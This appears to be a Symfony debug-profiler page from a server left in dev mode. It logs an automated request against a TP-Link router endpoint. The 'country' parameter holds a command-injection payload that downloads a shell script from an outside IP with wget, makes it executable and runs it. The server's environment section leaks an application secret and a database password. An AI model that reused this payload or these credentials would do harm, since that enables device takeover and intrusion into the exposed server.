n/a
Request
GET Parameters
Key | Value |
---|---|
country | "$(id>`cd /tmp; rm -rf r; wget http://176.65.148.234/sh; chmod 777 sh; ./sh tplink; rm -rf sh`)" |
form | "country" |
operation | "write" |
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_remove_csp_headers | true |
Request Headers
Header | Value |
---|---|
host | "128.93.162.66:80" |
user-agent | "Go-http-client/1.1" |
x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Thu, 01 May 2025 08:24:42 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22GET%20http%3A%2F%2F128.93.162.66%2Fcgi-bin%2Fluci%2F%3Bstok%3D%2Flocale%22" |
x-debug-exception-file | "%2Fappli%2Fmetrics%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:136" |
x-debug-token | "0098a4" |
x-debug-token-link | "http://128.93.162.66/_profiler/6d7ea8" |
x-previous-debug-token | "6d7ea8" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "b1cbb61809bfe330f88de81415c23284" |
DATABASE_URL | "postgresql://postgres:DTDtfycuiugip689009!:;@127.0.0.1:5432/db_name?serverVersion=13&charset=utf8" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTEXT_DOCUMENT_ROOT | "/appli/metrics/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/appli/metrics/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTP_HOST | "128.93.162.66:80" |
HTTP_USER_AGENT | "Go-http-client/1.1" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)" |
REMOTE_ADDR | "141.98.11.128" |
REMOTE_PORT | "33472" |
REQUEST_METHOD | "GET" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1746087882 |
REQUEST_TIME_FLOAT | 1746087882.591 |
REQUEST_URI | "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)" |
SCRIPT_FILENAME | "/appli/metrics/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "128.93.162.66" |
SERVER_ADMIN | "[no address given]" |
SERVER_NAME | "128.93.162.66" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.29 (Ubuntu) Server at 128.93.162.66 Port 80</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.29 (Ubuntu)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL" |